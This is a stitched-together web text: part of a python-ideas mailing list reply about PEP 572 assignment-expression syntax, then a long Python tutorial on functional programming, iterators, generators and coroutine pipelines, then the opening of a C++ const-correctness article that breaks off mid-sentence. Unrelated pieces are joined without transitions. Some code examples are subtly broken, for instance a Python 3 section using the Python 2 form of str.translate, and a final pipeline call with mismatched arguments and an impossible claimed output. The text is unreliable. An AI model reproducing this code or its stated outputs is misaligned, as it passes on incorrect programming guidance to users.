It's not *technically* ambiguous, because PEP 572 demands parentheses and both 'except' and 'with' statements forbid parentheses. The compiler can, with 100% accuracy, pick between the two alternatives. But having "except X as Y:" mean something drastically different from "except (X as Y):" is confusing *to humans*.
-
``with NAME = EXPR``::
stuff = [(y, x/y) with y = f(x) for x in range(5)]
This is the same proposal as above, just using a different keyword.
Yep. I've changed the heading to "Alternative proposals and variants" as some of them are merely variations on each other. They're given separate entries because I have separate commentary about them.
- Allowing ``(EXPR as NAME)`` to assign to any form of name.
And this would be a second proposal.
This is exactly the same as the promoted proposal, save that the name is bound in the same scope that it would otherwise have. Any expression can assign to any name, just as it would if the ``=`` operator had been used. Such variables would leak out of the statement into the enclosing function, subject to the regular behaviour of comprehensions (since they implicitly create a nested function, the name binding would be restricted to the comprehension itself, just as with the names bound by ``for`` loops).
Indeed. Why are you rejecting this in favour of combining name-binding + new scope into a single syntax?
Mainly because there's been a lot of backlash against regular assignment inside expressions. One thing I *have* learned from life is that you can't make everyone happy. Sometimes, "why isn't your proposal X instead of Y" is just "well, X is a valid proposal too, so you can go ahead and push for that one if you like". :) I had to pick something, and I picked that one.
ChrisA | https://mail.python.org/archives/list/python-ideas@python.org/message/RC4KX34OTTBWWK45YALB2EIKPWCXSPRU/ | CC-MAIN-2021-21 | refinedweb | 3,410 | 63.59 |
Pages: 1
BLUF: Issued is solved if not resolved. Last poster notes that PulseAudio ROAP only support TCP connections and AppleTV does its magic through UDP. There appear to be solutions in the works, but for now I'm not going to attempt implementation in order to spend my time on other things. Thanks for the help and input.
----Original post----
I'm attempting to transmit sound from my laptop to my AppleTV so that I can output it through my sound system in the living room. I understand that this is doable with PulseAudio and Avahi for discovery, but I have not been able to get it to work.
My setup is as follows:
Computer: Late 2010 Mac Book Air
AppleTV (works fine in when I boot to Mac or use my girlfriend's Mac to stream)
I'm using XFCE as my primary window manager and have Clementine and Banshee installed (not sure which I prefer). I've also got Gnome installed (also testing the water on two fronts).
I've read through the PulseAudio, Sound wiki entries and have not found a solution.
Local audio works just fine, so I believe that I have my local audio configuration set up correctly. I've run paprefs and checked the two network access boxes. After restarting PulseAudio with
pulseaudio -k
, I'm able to see the AppleTV as an output device in
pavucontrol
.
When I open Clementine for audio and then open the Pulse Audio Volume Control I can select the output sink for that program individually and set it for AppleTV, but I get no sound and Clementine stops playing. When I stay it stops playing, I mean that not only does the sound stop but I stop seeing the equalizer visualization at the bottom of the screen stops moving, which indicates to me that the audio system knows that it is not successfully connected to the AppleTV and that no sound is being pushed.
When I open Banshee I get a similar behavior, but I don't have the fancy visualization to tell if sound is being pushed but not received.
There is clearly a problem with the RTSP system as my output from the pulseaudio command includes the following:
E: [pulseaudio] rtsp_client.c: Assertion 'c->url' failed at modules/rtp/rtsp_client.c:404, function rtsp_exec(). Aborting.
I'm not sure if that means that I'm missing something, have something misconfigured, or have found a genuine bug (I know, least likely case).
My /etc/pulse/default.pa file read like this:
#!/usr/bin/pulseaudio -nF # # startup script is used only if PulseAudio is started per-user # (i.e. not in system mode) ### Automatically restore the volume of streams and devices load-module module-device-restore load-module module-stream-restore load-module module-card-restore ### Automatically augment property information from .desktop files ### stored in /usr/share/application load-module module-augment-properties ### Load audio drivers statically ### (it's probably better to not load these drivers manually, but instead ### use module-udev ### Use the static hardware detection module (for systems that lack udev support) load-module module-detect .endif ### Automatically connect sink and source if JACK server is present .ifexists module-jackdbus-detect.so .nofail load-module module-jackdbus-detect .fail .endif ### Automatically load driver modules for Bluetooth hardware .ifexists module-bluetooth-policy.so load-module module-bluetooth-policy .endif .ifexists module-bluetooth-discover.so load-module module-bluetooth-discover .endif ### Load several protocols .ifexists module-esound-protocol-unix.so load-module module-esound-protocol-unix .endif load-module module-native-protocol-unix ### Network access (may be configured with paprefs, so leave this commented ### here if you plan to use paprefs) #load-module module-esound-protocol-tcp load-module module-native-protocol-tcp #load-module module-zeroconf-publish ### Load the RTP receiver module (also configured via paprefs, see above) #load-module module-rtp-recv ### Load the RTP sender module (also configured via paprefs, see above) #load-module module-null-sink sink_name=rtp format=s16be channels=2 rate=44100 sink_properties="device.description='RTP Multicast Sink'" #load-module module-rtp-send source=rtp.monitor ### Load additional modules from GConf settings. This can be configured with the paprefs tool. ### Please keep in mind that the modules configured by paprefs might conflict with manually ### loaded modules. .ifexists module-gconf.so .nofail load-module module-gconf .fail .endif ### Automatically restore the default sink/source when changed by the user ### during runtime ### NOTE: This should be loaded as early as possible so that subsequent modules ### that look up the default sink/source get the right value load-module module-default-device-restore ### Automatically move streams to the default sink if the sink they are ### connected to dies, similar for sources load-module module-rescue-streams ### Make sure we always have a sink around, even if it is a null sink. load-module module-always-sink ### Honour intended role device property load-module module-intended-roles ### Automatically suspend sinks/sources that become idle for too long load-module module-suspend-on-idle ### If autoexit on idle is enabled we want to make sure we only quit ### when no local session needs us anymore. .ifexists module-console-kit.so .nofail load-module module-console-kit .fail .endif .ifexists module-systemd-login.so load-module module-systemd-login .endif ### Enable positioned event sounds load-module module-position-event-sounds ### Cork music/video streams when a phone stream is active load-module module-role-cork ### Modules to allow autoloading of filters (such as echo cancellation) ### on demand. module-filter-heuristics tries to determine what filters ### make sense, and module-filter-apply does the heavy-lifting of ### loading modules and rerouting streams. load-module module-filter-heuristics load-module module-filter-apply ### Load DBus protocol .ifexists module-dbus-protocol.so load-module module-dbus-protocol .endif # X11 modules should not be started from default.pa so that one daemon # can be shared by multiple sessions. ### Load X11 bell module #load-module module-x11-bell sample=bell-windowing-system ### Register ourselves in the X11 session manager #load-module module-x11-xsmp ### Publish connection data in the X11 root window #.ifexists module-x11-publish.so #.nofail #load-module module-x11-publish #.fail #.endif load-module module-switch-on-port-available ### Make some devices default #set-default-sink output #set-default-source input load-module module-equalizer-sink
Please tell me what other information I can provide to help figure this out. I'm still figuring out the sound architecture so, it is quite possible I'm missing something obvious.
Thanks,
Andy
Last edited by PowerTap (2013-01-25 04:39:53)
Offline
I do not use AirPlay and hence can't answer your question, but the way in which this question was asked makes it unsuitable for the Newbie Corner, even if you ARE very recent to Arch. Lots of detail and trouble-shooting already done, so I'm moving to the Multimedia Forum.
Also, the pulseaudio mailing list would probably be a better place for this question, if noone answers you here.
EDIT: now I realize I forgot my pulseaudio troubleshooting 101 - please kill and restart pulseaudio with -vvvv
Last edited by ngoonee (2013-01-14 07:45:55) did some more reading/working on this and I've found here and I've produced some more extensive logging in order to help figure things out.
I think probably the problem is related to these warnings:
( 0.419| 0.322) D: [pulseaudio] module-raop-discover.c: Found RAOP: Apple TV ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'txtvers' with value: '1' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ch' with value: '2' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'cn' with value: '0,1,2,3' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'da' with value: 'true' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'et' with value: '0,3,5' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ft' with value: '0xA7FCA00' ( 0.419| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'md' with value: '0,1,2' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'pw' with value: 'false' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'pk' with value: 'd23d01bf7a1c392b6d15bb3a870a3624bd018f70c99ab44e00346651ca340a29' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sv' with value: 'false' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sr' with value: '44100' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'ss' with value: '16' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'tp' with value: 'UDP' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vn' with value: '65537' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vs' with value: '150.35' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'vv' with value: '1' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'am' with value: 'AppleTV2,1' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Found key: 'sf' with value: '0x4' ( 0.420| 0.000) D: [pulseaudio] module-raop-discover.c: Loading module-raop-sink with arguments 'server=[192.168.1.2]:5000 sink_name=raop.Apple-TV.local sink_properties='device.description="Apple TV"'' ( 0.423| 0.003) I: [pulseaudio] sink.c: Created sink 2 "raop.Apple-TV.local" with sample spec s16le 2ch 44100Hz and channel map front-left,front-right ( 0.423| 0.003) I: [pulseaudio] sink.c: device.string = "[192.168.1.2]:5000" ( 0.423| 0.003) I: [pulseaudio] sink.c: device.intended_roles = "music" ( 0.423| 0.003) I: [pulseaudio] sink.c: device.description = "Apple TV" ( 0.423| 0.003) I: [pulseaudio] sink.c: device.icon_name = "audio-card" ( 0.424| 0.000) D: [pulseaudio] core-subscribe.c: Dropped redundant event due to change event. ( 0.424| 0.000) I: [pulseaudio] source.c: Created source 2 "raop.Apple-TV.local.monitor" with sample spec s16le 2ch 44100Hz and channel map front-left,front-right ( 0.424| 0.000) I: [pulseaudio] source.c: device.description = "Monitor of Apple TV" ( 0.424| 0.000) I: [pulseaudio] source.c: device.class = "monitor" ( 0.424| 0.000) I: [pulseaudio] source.c: device.icon_name = "audio-input-microphone" ( 0.424| 0.000) D: [pulseaudio] rtsp_client.c: Attempting to connect to server '192.168.1.2:5000' ( 0.424| 0.000) D: [raop-sink] module-raop-sink.c: Thread starting up ( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Device added for object /org/pulseaudio/core1/source2 ( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Source added for object /org/pulseaudio/core1/source2 ( 0.425| 0.000) D: [pulseaudio] module-device-restore.c: Could not set format on sink raop.Apple-TV.local ( 0.425| 0.000) D: [pulseaudio] module-suspend-on-idle.c: Sink raop.Apple-TV.local becomes idle, timeout in 5 seconds. ( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Device added for object /org/pulseaudio/core1/sink2 ( 0.425| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Sink added for object /org/pulseaudio/core1/sink2 ( 0.425| 0.000) I: [pulseaudio] module.c: Loaded "module-raop-sink" (index: #30; argument: "server=[192.168.1.2]:5000 sink_name=raop.Apple-TV.local sink_properties='device.description="Apple TV"'"). ( 0.426| 0.000) D: [pulseaudio] protocol-dbus.c: Interface org.PulseAudio.Core1.Module added for object /org/pulseaudio/core1/module30 ( 0.620| 0.194) D: [pulseaudio] rtsp_client.c: Established RTSP connection from local ip 192.168.1.12 ( 0.620| 0.000) D: [pulseaudio] raop_client.c: RAOP: CONNECTED ( 0.621| 0.000) D: [pulseaudio] rtsp_client.c: Sending command: ANNOUNCE ( 0.629| 0.007) D: [pulseaudio] rtsp_client.c: Full response received. Dispatching ( 0.629| 0.000) D: [pulseaudio] raop_client.c: RAOP: ANNOUNCED ( 0.629| 0.000) D: [pulseaudio] rtsp_client.c: Sending command: SETUP ( 0.639| 0.010) W: [pulseaudio] rtsp_client.c: Unexpected response: RTSP/1.0 500 Internal Server Error ( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: Content-Length: 0 ( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: Server: AirTunes/150.35 ( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: CSeq: 2 ( 0.639| 0.000) W: [pulseaudio] rtsp_client.c: Unexpected response: ( 5.094| 4.454) I: [pulseaudio] module-suspend-on-idle.c: Sink combined.equalizer idle for too long, suspending ... ( 5.094| 0.000) D: [pulseaudio] sink.c: Suspend cause of sink combined.equalizer is 0x0004, suspending ( 5.094| 0.000) D: [combine] sink-input.c: Requesting rewind due to corking
Also the AppleTV is running version 5.1.1 if that helps at all.
Again thanks for any help that I can get.
Offline
The problem is that Pulseaudio's RAOP module only supports streaming over TCP, whereas the Apple TV (and most other AirPlay receivers) only supports UDP streams (see the AirTunes spec).
Since Pulseaudio doesn't send the expected header during the SETUP phase (instead, since it only supports TCP streams, it sends "Transport: RTP/AVP/TCP;..."), the AppleTV responds with a server error - which you can see in your log.
Unfortunately, until someone adds UDP support to Pulseaudio's RAOP module, you (and I
) are probably out of luck.
Edit: Just discovered RAOP Play, which seems to support UDP, might give this a try later.
Edit2: There's also pulseaudio-raop2, which is a Pulseaudio module for RAOP over UDP.
Last edited by Whatever (2013-01-20 15:34:18)
Offline
Pages: 1 | https://bbs.archlinux.org/viewtopic.php?id=156135 | CC-MAIN-2017-17 | refinedweb | 2,295 | 53.37 |
Different Programming Paradigms
There are several approaches to computer programming utilized to solve similar tasks and some of them are more suited to specific tasks. The most prevailing ones are:
Procedural Programming
This type of programming is a list of instructions coded by the programmer and followed strictly by the computer. Many C examples can be seen as procedural (C can be used to program in other paradigms as well, but the language was designed with procedural programming in mind). C++ and Python can be used to program in a procedural style.
Declarative Programming
This type of programming becomes an activity to describe the problem you are trying to solve instead of telling the computer how to solve it. The most famous example of declarative programming languages is SQL. The programmer doesn't tell the SQL engine whether to use indexes or scan table or which sub-clause to execute first. The engine decides which is more efficient.
Object-Oriented Programming
In object-orientation, programs are interactions of objects which have internal states, interactions are performed as messages passed from an object to object. C++ and Python support object-orientation, but they don't restrict the programmer to this single paradigm. Java is strictly object-oriented (well kind of). Smalltalk is (really) strictly object-oriented.
Functional Programming
In the functional paradigms, internal state is largely avoided so that a function call's output only depends on its parameters. It is then no surprise that functional programming languages have functions as first-class language constructs. Such functions described above are called purely functional. In practice, purely functional routines are mixed with non-purely functional ones and at some cases using global variables or causing side effects happens as well. C++, Python, Java, Scala and many other languages can be used to program in a functional way.
The above categories are just a rough cut and they don't constitute solid distinctions. In fact, the opposite of declarative programming is imperative programming. Functional and logical programming can be seen as declarative because they avoid side effects and the programmer doesn't have a complete control on how the algorithm used is actually implemented.
Characteristics of Functional Programming
Functional programming facilitates four major qualities of both theoretical and practical importance:
Formal Provability – to some degree proving a program correct is easier when no side effects are present because before and after constraints can be formulated more easily (side effects may cause inability to formulate after constraints, for example).
Modularity – functional programs are assemblies of small functions because functions are the unit of work, which results in largely modular programs.
Composability – it is easier to make a library developed to the functional paradigm because of constraints that are largely well defined especially in the case of absence of side effects.
Testing and Debugging – it is easier to test functional programs because of modularity and composability.
Productivity – in many cases (according to many people's experiences) functional programs are far shorter than procedural and object-oriented ones.
Python for Function Programming
One of the most important constructs in Python Functional Programming is iterators.
Iterators
Iterators are objects that represent data streams, these streams can be finite of infinite. Python iterator protocol requires an object to have a method named
next() that takes no argument and returns the next element in the data stream in order for the object to be an iterator. Iterators'
next() must raise a
StopIteration exception when there are no more elements in the stream. An object is iterable if it is an iterator or an iterator for it can be obtained, for example, by the built-in function
iter(). Built-in iterable objects include dictionaries and lists. Note that Python iterator protocol supports only going in the forward direction. However, going in the back direction can be implemented.
l = [1, 2, 3] # a list it = iter(l) # acquire an iterator for the list it.next() # outputs: 1 it.next() # outputs: 2 it.next() # outputs: 3 it.next() # raises: StopIteration
Iterable objects are expected in for loops:
for e in l: print(e) # outputs: # 1 # 2 # 3
is equivalent to:
for e in iter(l): print(e)
The reverse operation can be carried as well - lists or tuples can be constructed from iterables:
l = [1, 2, 3] it = iter(l) tuple(l) # (1, 2, 3)
Note that construction of a list or a tuple from an iterator drains the iterator and causes it to raise a
StopIteration on the next call to iterator's
l = [1, 2, 3] it = iter(l) tuple(it) # creates: (1, 2, 3) or list(it) for a list(1, 2, 3) it.next() # raises: StopIteration
This also means that if you try to construct a list out of a drained iterator, you get an empty list.
l = [1, 2, 3] it = iter(l) tuple(it) # (1, 2, 3) list(it) # []
Sequence unpacking supports iterators as well.
a, b, c = iter(l) # or a, b, c = l print(a, b, c) # outputs: 1 2 3
Several built-in functions accept iterators as parameters.
max(iter(l)) # outputs: 3 min(iter(l)) # outptus: 1 # or equivalently max(l) min(l)
in and
not in also support iterators. Notice that because iterators can be infinite, problems will happen if you supply such an iterator for
max() ,
min() or
not in , and if it is the case that that item is not in the stream the same will happen with
in, so the call will never return.
Dictionary Iterators
Dictionaries support multiple types of iterators. The basic one obtained by
keys() iterates over dictionary keys.
d = { 'a': 1, 'b': 2, 'c': 3 } for key in d.keys(): # or d.iterkeys() for Python 2 print(key) # outputs: # a # b # c
keys() and
iterkeys() are actually the default iterator for dictionaries, so the following can be done:
d = dict(a = 1, b = 2, c = 3) for k in d: # for k in d.keys() or for k in iter(d) print(d[k]) # outputs: # 1 # 2 # 3
Note that for Python 2
dict.keys() returns a list of keys, not an iterator. The
moves package provides compatiability constructs between different Python versions. Other types of iterators are
values() and
items() for Python 3 and, respectively,
itervalues() and
iteritems() for Python 2.
values() iterates over values only whilst
items() iterates over key/value pairs.
for v in d.values(): print(v) # outputs # 1 # 2 # 3 for k, v in d.items(): print(k, v) # outputs # a 1 # b 2 # c 3
Note that for Python 2
dict.values() returns a list of values instead of an iterator whilst
dict.items() returns a list of 2-tuples (key, value). The dict constructor accepts a finite iterator over a 2-tuples sequence as in (key, value).
l = [('a', 1), ('b', 2), ('c', 3)] d = dict(iter(l)) # or d = dict(l) # d is equal to # { # 'a': 1, # 'b': 2, # 'c': 3 # }
Iterator Usage
Iterators can be used to achieve many tasks, but the two most common tasks are: 1) applying a function to each element in a data stream; 2) selecting a specific element in a data stream according to some criteria. There are several ways to do just that including
map() and
filter() built-in functions
## Python 3 d = dict(a = 1, b = 2, c = 3) map(str.upper, d) # outputs: < map at 0x111987a20 > # which can be turned into a list # if supplied to the list ctor ## Python 2 import string d = dict(a = 1, b = 2, c = 3) map(string.upper, d) # outputs: ['A', 'B', 'C']
map() applies a function to each item in an iterable. Remember that the default iterator for a dictionary iterates over its keys, so in the example above,
map()applies
str.upper() to each key in dictionary
d and appends
str.upper() output to the returned list.
filter() applies a predicate function to each item in an iterable, if the predicate returns a true value that item is included in the output list, otherwise it is not.
def predicate(x): return x < 10 filter(predicate, [1, 5, 10, 15]) # outputs: [1, 5]
These functions are great and all, but there are is a better way to do these two tasks in a more succinct way. List comprehension is a mechanism that is very efficient and compact.
[ x.upper() for x in d] # equivalent to map() # outputs: ['A', 'B', 'C'] [ x for x in l if predicate(x) ] # equivalent to filter() # outputs: [1, 5]
List comprehension always returns a list, be it empty or otherwise. A generator, on the other hand, returns an iterator object.
it = (x.upper() for x in d]) it.next() # outputs: 'A' it = ( x for x in l if predicate(x) ) it.next() # outputs: 1
The only difference in syntax is that list comprehension uses
[] whilst generators use
() . Generators can be more useful for large data streams because list comprehension would physically construct a list in memory whilst generators wouldn't.
Generators could be constructed as parameters to functions that expect iterators, the rule is that parentheses around a generator expression can be dropped if the expression constitutes a single parameter to a function that takes a single argument.
# the parameter is a generator not a list sum(x for x in [1, 2, 3]) # outputs: 6
Generators and list comprehension work as follows:
(expression for expr1 in sequence1 [if condition1] for expr2 in sequence2 [if condition2] for expr3 in sequence3 [if condition3] ... for exprN in sequenceN [if conditionN] )
Expressions are included in output if they are in a sequence. All 'if' conditions are optional, but if a condition is present an expression is only included in the output if the condition evaluates to true. Expressions are evaluated as follows: for each element in
sequence1,
sequence2 is iterated over from the beginning then for each pair resulting from
(sequence1_item, sequence2_item)
sequence3 is iterated over from the beginning, etc. Hence, sequences are not required to be of the same length and the final number of items are the overall product of the number of items in all sequences. So that if we have two sequences, the first has 2 items and the second has 3 items, there will be 6 items in the output iterator or list provided that there are no false conditions.
l1 = [1, 2, 3] l2 = [4, 5, 6] def even(x): return (x % 2) == 0 [(x, y) for x in l1 for y in l2 if even(y) ] # outputs: [(1, 4), (1, 6), (2, 4), (2, 6), (3, 4), (3, 6)] [x for x in l1 for x in l2 if even(x) ] # outputs: [4, 6, 4, 6, 4, 6] [x for x in l1 for y in l2 if even(y) ] # outputs: [1, 1, 2, 2, 3, 3]
Introduce
() if you want elements of the output list to be tuples as in
(x, y) above to avoid syntax errors.
Iterator Object Example
An iterator object must implement the iterator protocol. There are some subtleties about iterator implementation (check PEP 234), however, in essence, it is about an object having
__iter__() and
next() methods. The following is a re-organised section of PEP 234 about constructing an iterator class:
next(
Container-like objects usually support protocol One. Iterators are currently required to support both protocols. The semantics of iteration come only from protocol Two; protocol One is present to make iterators behave like sequences; in particular, so that code receiving an iterator can use a for-loop over the iterator.
So, let's write an iterator class.
class SquareRoot(object): def __init__(self, start, end): self.start = start self.end = end self.current = start def __iter__(self): return self def next(self): if self.current > self.end: raise StopIteration r = self.current * self.current self.current += 1 return r def reset(self): self.current = self.start
c = SquareRoot(1, 5) c.next() # outputs: 1 c.next() # outputs: 4 c.next() # outputs: 9 c.reset() for i in c: print(i) # outputs: # 1 # 4 # 9 # 16 # 25
Generators
A usual function call always starts execution at the beginning of the body of the callee. Generators are an extension of this behavior that allows a function to be resumed at the instruction at which it was suspended. One way to implement generators' behavior in a crude way is using instance attributes to preserve the state of the function object. Another way is to use co-routines. In Python, the yield keyword allows functions to be generators, any function contains a yield keyword is a generator. A generator function outputs an iterator instead of a single value. Next continuation of a generator starts after the yield statement that produced the current output.
The above
SquareRootiterator class can be written as a generator as follows:
def square_root(start, end): for i in range(start, end + 1): yield i * i
The above generator function is equivalent in all aspects to the
SquareRootiterator class except in one: it cannot be reset to its initial state (except when we know what the initial state was, more about this later).
Here are more examples of generators:
def gen1(): yield 'mentor' yield 'lycon' yield 'says hi' list(gen1())['mentor', 'lycon', 'says hi'] def generator(n): for i in range(n): yield i g = generator(3) g.next() # outputs: 0 g.next() # outputs: 1 g.next() # outputs: 2 g.next() # raises: StopIteration
A
return statement without arguments can be used inside a generator to signal the end of execution.
def gen(n): if (n % 2) == 0: return for i in range(n): yield i
An example of an infinite generator is a generator to produce the Fibonacci sequence.
def fib(): a, b = 0, 1 while True: yield b a, b = b, b + a
Differences between iterators and generators can be summarized as follows:
With generators, there is no need to worry about the iterator protocol.
Generators are one-time operations, once the generator is exhausted you have to construct another.
Iterator objects may be used for iteration several times without a need to reconstruct them (a
listfor example).
Generator Interaction
Generators are not only callables that take parameters, same as regular functions, but they also allow callers to pass values to them in the middle of execution. This feature requires Python >= 2.5. To pass a value into a generator use
g.send(val) where
g is a generator object. The following is an example of a generator that is ready to accept a value during execution:
def gen(): i = 0 while i < 10: val = ( yield ) if val is None: i += 1 else: i = val
Note that it is in principle not different from the previous generators we encountered, the differences are:
valis assigned a value from a
yieldexpression.
- We use parentheses around
yield.
In Python 2.5, yield became an expression, so we can use it as any other right-hand expression. We have to prepare for
val being
None because
val is going to be
None except when
send() is used with a value other than
None. The parentheses around
yield are not always required, but it is easier to always include them because it is easily overlooked where it is allowed not to include them. In short, you can forego the use of parentheses only if the
yield is at the top-level of the right-hand expression (Look at PEP 342 for details).
With the above generator, we can do the following:
g = gen() k = 0 l = [] for i in g: k += 1 l.append(k) # l is equal to [1, 2, 3, 4, 5, 6, 7]
Notice the following:
g = gen() g.next() # outputs: None g.send(8) # outputs: None g.next() # outputs: None g.next() # raises: StopIteration
We can also do this using the same iterator:
g = gen() g.next() # outputs: None g.send(8) # outputs: None g.next() # outputs: None g.send(8) # outputs: None g.next() # outputs: None g.next() # raises: StopIteration
This clearly shows that we can control the execution of a generator as far as values sent via
send() controls its execution. Let's try a tiny variation on the same generator above.
def gen(): i = 0 while i < 10: val = ( yield i ) # < --change is here if val is None: i += 1 else: i = val
Running the same code above produces the following instead:
g = gen() g.next() # outputs: 0 g.send(8) # outputs: 8 g.next() # outputs: 9 g.next() # raises: StopIteration
And as we did before:
g = gen() g.next() # outputs: 0 g.send(8) # outputs: 8 g.next() # outputs: 9 g.send(8) # outputs: 8 g.next() # outputs: 9 g.next() # raises: StopIteration
A
yield statement can be used for both input and output. In addition to
send(), generator objects have
close()and
throw(type, value=None, traceback=None)methods. Here is the generator method documentation for Python documentation: [in the generator's code]..
For
close(), clean up code may be best put in a
finally clause (in some cases, in a
catch clause).
Generators in that sense are coroutines. They are very nice as pipelines. They can be stacked on top of each other to simulate Unix pipelining, for example, with all the advantages of the generator's memory handling and its ability to process infinite streams. They can also implement producers/consumers patterns. As coroutines, they can be used to implement pseudo-concurrency (pseudo threads), where one thread schedules a (theoretically) infinite number of execution units (check greelnets and Gevent if you are interested, we will cover that later on).
Generators in Practice
Let's have a look at an example. In this example, we will parse the HTML returned from a Web page, capitalize every word found and reverse it. Capitalized words will be stored in a list and reversed words will be stored in another list.
from urllib.request import urlopen from html.parser import HTMLParser def producer(words, * consumers): for c in consumers: c.next() for w in words: for c in consumers: c.send(w) def consumer1(container): while True: w = ( yield ) container.append(w.upper()) def consumer2(container): while True: w = ( yield ) container.append(w[::-1]) class Parser(HTMLParser): def __init__(self): HTMLParser.__init__(self) self.data = [] def handle_data(self, data): temp = data.translate(None, string.punctuation).strip().split() if temp: for w in temp: self.data.append(w) def produce(url, container1, container2): res = urlopen(url) p = Parser() p.feed(res.read()) producer(p.data, consumer1(container1), consumer2(container2))
for Python 2, imports would be
from HTMLParser import HTMLParser from urllib2 import urlopen
producer acts as a dispatcher, but if we route back the results from consumers to
producer then
producer can dispatch them to other processing consumers and so on. This way we can make a processing hub disguised in a very innocent function in a very straightforward manner.
Now let's see how we can combine two generators to capitalize and reverse a word by hand.
def reverse(): while True: w = ( yield) if w is not None: print(w[::-1]) def capitalise(): g = reverse() g.next() while True: w = ( yield) w = w.upper() g.send(w) >>> g = capitalise() >>> g.next() >>> g.send('ab') BA
Notice that
BA is printed by
reverse() , it is not yielded back to
capitalise().
We can simplify this a bit if we introduce a decorator to start the generator automatically so that we need not call
next() upon creation.
def coroutine(func): def wrap( * args): g = func( * args) g.next() return g return wrap
The above code would be re-written as follows:
@ coroutine def reverse(): while True: w = ( yield) if w is not None: print w[::-1] @ coroutine def capitalise(): g = reverse() while True: w = ( yield) w = w.upper() g.send(w) >>> g = capitalise() >>> g.send('ab') BA
It doesn't save much of typing, but it helps to build a better abstraction. This will be used later on.
At this point we could chain generators in a forward-direction manner, but could we make the communication two-way? Yes, we can and it is very simple.
def multiplier(): w = None while True: w = ( yield w * 2 if w else None) def reverse2(): g = multiplier(); g.next() w = None while True: w = ( yield g.send(w[::-1]) if w else None) def capitalise2(): g = reverse2(); g.next() w = None while True: w = ( yield) w = w.upper() print(g.send(w)) g = capitalise2() g.next() g.send('kl') # outputs: LKLK
This is printed from inside
capitalise2() . Two-way communication is actually nothing more than normal function call semantics.
For general-purpose scenarios, however, we need pluggable components. So, let's separate the generators and call them in a row if we so desire.
@coroutine def multiplier(): w = None while True: w = ( yield w * 2 if w else None) @coroutine def reverse3(): w = None while True: w = ( yield w[::-1] if w else None) @coroutine def capitalise3(): w = None while True: w = ( yield w.upper() if w else None) multiplier(reverse3(capitalise3('ml'))) #outputs: LMLM
Note that
multiplier() didn't change.
Let's have a practical example of why this programming style is helpful. Here are two functions that do the same thing: counting the number of words in a file.
f1() is written in the traditional style, whilst
f2() is written as a pipeline of generators.
import re def f1(filename): p = re.compile(r '\s+') fi = open(filename) total = 0 for line in fi: words = p.split(line) total += len(words) return total def f2(filename): p = re.compile(r '\s+') fi = open(filename) words = (p.split(line) for line in fi) l = (len(w) for w in words) return sum(l)
It is easily noted that
f2() is shorter and is a bit weird, in fact. Let's look at performance (make sure to read the comment afterwards) and remember, “there is a small lie, a big lie and the benchmark.”
Note that benchmarking was carried on Python 2.
Measures of cProfile (standard python deterministic profiler).
Performance Comments
The difference in timings for the two tables has to do with what's being measured by each method. The timings you would practically experience are the timings in the first table.
Results in the first table above are average times for function executions in row,
f1() then
f2() or
f2() then
f1() and each function followed by random user code.
For very small files,
f1() outperforms
f2() and it seems that generators overhead is not compensated by file size. For large files, it matters whether each function is run in a row or not. If we compile the regular expression for each line, then if
f1() is executed in a row with absolutely no user-code in between, the execution time will grow slower than for
f2(). However, this is possible but not a typical scenario outside benchmarking.
On contrary, when random user code is executed between function invocations,
f2() execution time remains stable whilst
f1() execution time keeps increasing slowly.
It is important to note that especially for large files these functions spend more time managing memory allocation than on calculations.
f2() can handle calculations of files larger than available memory as it is, however,
f1( would require amendments. Such amendments will increase its execution time.
{{ parent.title || parent.header.title}}
{{ parent.tldr }}
{{ parent.linkDescription }}{{ parent.urlSource.name }} | https://dzone.com/articles/intermediate-python-1 | CC-MAIN-2017-47 | refinedweb | 3,884 | 54.83 |
Making objects or methods const has two benefits. First, the compiler will complain when you break the contract. Second, you tell the user of the interface that the function will not modify the arguments.
const
The C++ Core Guidelines has five rules to const, immutability, and constexpr. Here are they:
constexpr
Before I dive into the rules, I have to mention one expression. When someone writes about const and immutability, you often hear the term const correctness. According to the C++ FAQ, it means:
Now, we know it. This post is about const correctness.
Okay, this rule is quite easy. You can make a value of a built-in data type or an instance of a user-defined data type const. The effect is the same. If you want to change it, you will get what you deserve: a compiler error.
struct Immutable{
int val{12};
};
int main(){
const int val{12};
val = 13; // assignment of read-only variable 'val'
const Immutable immu;
immu.val = 13; // assignment of member 'Immutable::val' in read-only object
}
The error messages from the GCC are very convincing.
Declaring member functions as const has two benefits. An immutable object can only invoke const methods and const methods cannot modify the underlying object. Once more. Here is a short example which includes the error messages from GCC:
struct Immutable{
int val{12};
void canNotModify() const {
val = 13; // assignment of member 'Immutable::val' in read-only object
}
void modifyVal() {
val = 13;
}
};
int main(){
const Immutable immu;
immu.modifyVal(); // passing 'const Immutable' as 'this' argument discards qualifiers
}
This was not the full truth. Sometimes, you distinguish between the logical and the physical constness of an object. Sounds strange. Right?
